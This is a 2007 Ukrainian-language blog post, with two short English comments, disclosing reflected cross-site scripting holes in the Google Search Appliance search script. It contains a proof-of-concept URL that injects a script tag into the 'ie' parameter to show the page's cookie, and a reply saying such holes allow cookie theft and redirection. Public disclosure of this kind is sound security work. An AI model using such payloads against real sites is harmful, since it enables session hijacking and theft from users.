Уразливості в Google Search Appliance

23:50 20.09.2007

Позавчора, 18.09.2007, я знайшов Cross-Site Scripting уразливості в пошуковому движку Google Search Appliance. Як раз коли виявив уразливості на www.mi5.gov.uk. Про що найближчим часом сповіщу компанію Google.

XSS:

Уразливості в скрипті search в параметрах ie, site, client та oe:

http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'

Гуглу потрібно більше слідкувати за безпекою своїх пошукових движків (про що я вже писав в MOSEB).


2 відповідей на “Уразливості в Google Search Appliance”

  1. John каже:

    is this script to steal other passwords etc?

  2. MustLive каже:

    John

    With these holes you can steal cookies (with passwords) or make any other XSS attacks (like redirection, code execution, etc).

    In this PoC example cookie will be showed (in alert box). For other attacks you need to use appropriate code.

Leave a Reply

You must be logged in to post a comment.